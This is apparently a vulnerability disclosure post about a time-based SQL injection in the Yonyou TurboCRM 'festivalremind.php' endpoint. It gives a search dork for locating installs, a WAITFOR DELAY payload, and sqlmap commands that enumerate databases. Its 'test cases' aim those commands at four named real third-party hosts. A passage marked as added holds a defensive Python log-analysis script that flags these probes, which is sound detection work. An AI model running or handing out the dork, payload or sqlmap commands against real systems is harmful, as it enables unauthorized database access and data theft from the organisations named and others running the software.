Yonyou TurboCRM Management System SQL Injection


Vulnerability author: error

Yonyou CRM customer relationship management system

Google keywords: intitle:用友TurboCRM intext:登录


Injection URL: /background/festivalremind.php?ID=1

Injection parameter: ID

Payload: ?ID=1; WAITFOR DELAY '0:0:5'--

sqlmap injection command: sqlmap -u 'http://xxxxxx/background/festivalremind.php?ID=1' --level 5 --risk 3 --technique=T --dbms mssql --dbs --random-agent --batch -v 3
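For defenders reviewing web server logs, the following added example (not part of the original post) flags requests to the endpoint above whose ID value is not a plain integer and checks whether a requested WAITFOR DELAY matches the observed response time. The log layout (combined format with the request duration in seconds appended) and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

VULN_PATH = "/background/festivalremind.php"   # endpoint named in the advisory
PARAM = "ID"                                   # injectable parameter named in the advisory
# Assumed log layout: combined log format with request duration (seconds) appended.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<url>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ (?P<secs>\d+(?:\.\d+)?)$')
DELAY_RE = re.compile(r"waitfor\s+delay\s+'(\d+):(\d+):(\d+)", re.IGNORECASE)

def param_value(query):
    """Return the decoded ID value; split on '&' only so ';' stays inside the value."""
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if name == PARAM:
            return unquote_plus(raw)
    return None

def classify(line):
    """Return (client_ip, verdict) for a suspicious request to the endpoint, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["url"])
    if parts.path.lower() != VULN_PATH:   # case-insensitive path match is an assumption
        return None
    value = param_value(parts.query)
    if value is None or (value.isascii() and value.isdigit()):
        return None                       # absent or plain integer: expected traffic
    d = DELAY_RE.search(value)
    if not d:
        return (m["ip"], "non-numeric ID")
    h, mi, s = map(int, d.groups())
    wanted = h * 3600 + mi * 60 + s
    # A response at least as slow as the requested delay suggests the statement ran.
    if float(m["secs"]) >= wanted:
        return (m["ip"], "WAITFOR DELAY executed")
    return (m["ip"], "WAITFOR DELAY attempted")

# Constructed sample log lines (documentation IP ranges), not from a real server.
SAMPLE = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /background/festivalremind.php?ID=1 HTTP/1.1" 200 512 0.031
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /background/festivalremind.php?ID=1;waitfor%20delay%20'0:0:5'-- HTTP/1.1" 200 512 5.042
203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /background/festivalremind.php?ID=1%3Bwaitfor+delay+%270%3A0%3A5%27-- HTTP/1.1" 500 0 0.040
203.0.113.9 - - [01/Jan/2024:10:01:02 +0000] "GET /background/festivalremind.php?ID=1%27 HTTP/1.1" 500 0 0.020
""".splitlines()

if __name__ == "__main__":
    print([classify(entry) for entry in SAMPLE])
```

An "executed" verdict means the server held the response for the requested delay, so that host should be treated as vulnerable and its database activity reviewed; "attempted" means the probe was sent but the delay did not show up in the response time.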

Proof of vulnerability:

Test cases:

(1) http://crm.szclou.com:8088/background/festivalremind.php?ID=1

python sqlmap.py -u http://crm.szclou.com:8088/background/festivalremind.php?ID=1 --level 5 --risk 3 --dbms mssql --dbs --batch -v 1 --random-agent --technique=T


(2) http://www.kdlian.com:8001/background/festivalremind.php?ID=1

python sqlmap.py -u http://www.kdlian.com:8001/background/festivalremind.php?ID=1 --level 5 --risk 3 --dbms mssql --dbs --batch -v 3 --random-agent --technique=T

 


(3) http://218.94.82.23/background/festivalremind.php?ID=1

python sqlmap.py -u http://218.94.82.23/background/festivalremind.php?ID=1 --level 5 --risk 3 --dbms mssql --dbs --batch -v 3 --random-agent --technique=T


(4) http://220.113.5.194/background/festivalremind.php?ID=1

python sqlmap.py -u http://220.113.5.194/background/festivalremind.php?ID=1 --level 5 --risk 3 --dbms mssql --dbs --batch -v 3 --random-agent --technique=T


Other cases:
